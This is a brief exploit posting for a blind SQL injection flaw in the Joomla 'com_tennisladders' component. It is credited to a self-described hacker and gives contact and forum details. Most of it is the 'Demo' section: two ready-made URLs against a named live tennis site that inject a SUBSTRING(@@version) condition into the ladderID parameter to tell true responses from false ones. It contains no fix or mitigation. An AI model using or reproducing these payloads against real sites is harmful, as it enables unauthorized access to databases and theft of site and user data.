#--------------------------------------------------------
#Joomla com_tennisladders Blind SQL Injection Exploit
#--------------------------------------------------------
#Discovered By: Snakespc     ALGERIAN HaCkEr 
#Mail: snakespc@gmail.com 
#site:anti-sec.info/vb/index.php      
#-------------------------------------------------------
#Exploit:
#--------
#Demo:
#http://www.globaltennisnetwork.com/index.php?option=com_tennisladders&Itemid=63&task=ladder&ladderID=810+AND SUBSTRING(@@version,1,1)=5 yas
#http://www.globaltennisnetwork.com/index.php?option=com_tennisladders&Itemid=63&task=ladder&ladderID=810+AND SUBSTRING(@@version,1,1)=4 no
----------------------------------------------------------